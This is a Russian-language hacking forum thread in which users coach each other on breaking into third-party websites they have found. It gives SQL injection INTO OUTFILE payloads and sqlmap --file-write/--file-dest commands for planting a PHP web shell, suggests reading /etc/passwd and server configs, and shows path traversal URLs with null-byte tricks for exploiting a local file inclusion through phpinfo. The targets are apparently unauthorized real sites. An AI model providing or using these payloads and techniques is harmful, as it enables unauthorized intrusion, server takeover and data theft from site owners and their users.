Добрый день.

Есть сайт с ошибкой

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in var\www\core\mods\groups\deletegroup.php on line 20

Как залить шелл, есть пути и file priv Y ?

CURRENT USER -ROOT

Основные способы:

1) Использовать юзер-функции

2) INTO [DUMPFILE|OUTFILE]

PHP:
select '' into outfile 'полный путь к папкам/shell.php'

Ты сайт выложи сюда

Вообщем смог раскрутить через sqlmap, есть доступ к базе, насчет прав - пишет root@localhost. права на чтение и запись есть.функция load_file работает, получилось получить файл "/etc/passwd

Ну вот пытаюсь залить через sqlmap командой --file-write="C:\путь\тут php файл " --file-dest="путь"

выдает мне такое http://www.uppic.org/image-290A_52349E6D.jpg

на папке прав на запись в папке, ищи другую

qaz said:
на папке прав на запись в папке, ищи другую


Да вот странно имею такие привилегии http://www.uppic.org/image-49B6_5234A73E.jpg

А залить даже в temp не могу

RWD said:
Да вот странно имею такие привилегии
А залить даже в temp не могу


какие такие? у тебя рут права только в майскул, в фс они отношения не имеют

может знаний не хватает? раз софтом пытаешься шелл залить..

хватит флудить, есть статья от нолика, начни оттуда,а эта тема обсуждалась тут со времен динозавров.

ТС, можешь сделать дамп БД?

И что за сайт то?

база на том же сервере? файлы читать можешь? Прочитай хотябы тот файл где ошибку показывает. Ну или конфиг апач\нжнкс \ етк посомтри, или hosts

Если все ок, ищи диру под запись.

m00c0w said:
база на том же сервере? файлы читать можешь? Прочитай хотябы тот файл где ошибку показывает. Ну или конфиг апач\нжнкс \ етк посомтри, или hosts
Если все ок, ищи диру под запись.


Файлы читаются. Файл с ошибкой читается.

RWD said:
Ну вот пытаюсь залить через sqlmap командой --file-write="C:\путь\тут php файл " --file-dest="путь"


--file-write="C:\путь\тут php файл "

Что за путь здесь нужно указывать?

--file-dest="путь" здесь я так понял путь к файлам сайта

RWD said:
Файлы читаются. Файл с ошибкой читается.


Ручками залей уже

vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by ""--+

или

vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by ""--+​

2 Sat-hacker

вобщемта тут и понимать нечего -hh опция все покажет.

--file-write=WFILE Write a local file on the back-end DBMS file system

--file-dest=DFILE Back-end DBMS absolute filepath to write to

решил попробовать заюзать lfi найденный не так давно на неком сайте

оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил

есть доступ к phpinfo и php.ini

подскажите хороший мануал =(

psihoz26 said:
решил попробовать заюзать lfi найденный не так давно на неком сайте
оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил
есть доступ к phpinfo и php.ini
подскажите хороший мануал =(


Классика https://rdot.org/forum/showthread.php?t=1134&highlight=phpinfo

заюзал скрипт и при инклуде у меня пустая страничка

perl lfi.pl httр//site.com/i.php httр://www.site.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00

как только скрипт выполняется я копирую имя файла tmp/******

и инклужу

http://www.site.com/index.php?page=../../../../../../../../../../../../../../tmp/******%00

что может быть не так?? в скрипте ничего менять не надо??

m00c0w said:
Ручками залей уже
vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by ""--+
или
vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by ""--+​
2 Sat-hacker
вобщемта тут и понимать нечего -hh опция все покажет.
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to


Я это читал но не могу вкурить,обьясните если можна

Sat-hacker said:
Я это читал но не могу вкурить,обьясните если можна


В sqlmap --file-write="C:\shell.php" sqlmap берет шелл куда ты его положил на своем жд, --file-dest="/var/www/html/site.com" это куда sqlmap будет копировать файл шелла на сервере, при условии что есть права на запись файла.

К примеру так.

python sqlmap.py -u "http://dcsdcsdcds.com/index.php?id=12

--random-agent --file-write="C:\sqlmap\shell.php" --file-dest="var/www/html/dcsdcsdcds.com/images/"

товарищи, кто нибудь использует сокращение команд? -z. Удобно же.